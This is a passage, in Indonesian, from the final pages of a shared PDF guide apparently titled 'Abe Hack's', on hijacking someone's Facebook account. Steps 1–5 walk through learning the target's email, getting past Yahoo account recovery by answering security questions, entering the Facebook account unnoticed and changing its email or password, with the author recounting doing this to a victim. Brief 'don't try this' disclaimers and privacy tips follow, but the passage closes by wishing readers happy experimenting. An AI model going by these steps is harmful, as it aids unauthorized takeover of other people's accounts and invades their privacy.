     1. Hal yang harus kita ketahui untuk mengambil alih akun FB orang, tentukan E-
       mail si target. Ini penting sekali.
     2. Saat memasuki bantuan masuk di akun YAH**, kita harus tahu: 1) E-mail target
       kita, 2) Mampu menjawab pertanyaan yang di ajukan. Apabila pada tahap ini
       belum bisa melalui semua, maka kemungkinan untuk berhasil semakin sedikit.
     3. Tahap setalah berhasil masuk ke akun E-mail tadi, kita langsung menuju akun FB
28     untuk segera melancarkan serangan kita.




     Abe Hack’s | ~Computer Maniac’s~
     4. Hati-hati jangan sampai ketahuan target kita bahwa sedang melakukan pencurian
       akun FB-nya. (Berdasarkan pengalaman, saya melakukannya ketika korban
       sedang online. Terpaksa harus main kebut-kebutan dech … hehehe         ).
     5. Setelah mampu melewati cara-cara di atas dan berhasil masuk ke akun target
       segera ganti login masuk FB dengan mengganti alamat E-mail atau password
       sesuai dengan niat kita.
     6. Saran saya, jangan pernah melakukan ini. Cukup menjadi pengalaman dari sikap
       ke-egoisan saya terhadap seseorang !!!
     7. Bagi calon korban-korban “Hacker” atau apalah istilah yang digunakan, berhati-
       hatilah terhadap data pribadi kita khususnya pada situs jejaring seperti FB atau
       lainnya. Tetap jaga privasi kita dari orang yang tidak kita inginkan, jangan pernah
       percaya dengan teman atau siapapun juga. Adakalanya kita harus berhati-hati
       dengan teman 1000x lebih waspada daripada musuh kita sendiri.
     8. “Hacker” dalam FB bisa jadi itu adalah teman kita sendiri atau kerabat yang telah
       merasa kita sakiti hatinya baik secara langsung maupun tidak sehingga
       membuatnya harus mencuri akun FB kita.
     9. Terakhir ini semua pengalaman pribadi jadi jangan di praktekan ya. Terimakasih.

     Nah, dari beberapa cara hack facebook dan pencegahannya di atas semoga anda lebih
     berhati-hati, untuk lebih detail mengenai tiap metode atau cara yang saya sebutkan di
     atas akan saya bahas di postingan saya yang selanjutnya, semoga bermanfaat dan
     semoga akun facebook anda tidak kena hack

     Selamat berekperimen untuk mencoba berbagai cara hack facebook

     Source: Berbagai artikel di Google!




29




     Abe Hack’s | ~Computer Maniac’s~

				
DOCUMENT INFO
Shared By:
Tags:
Stats:
views:863
posted:4/16/2011
language:Indonesian
pages:29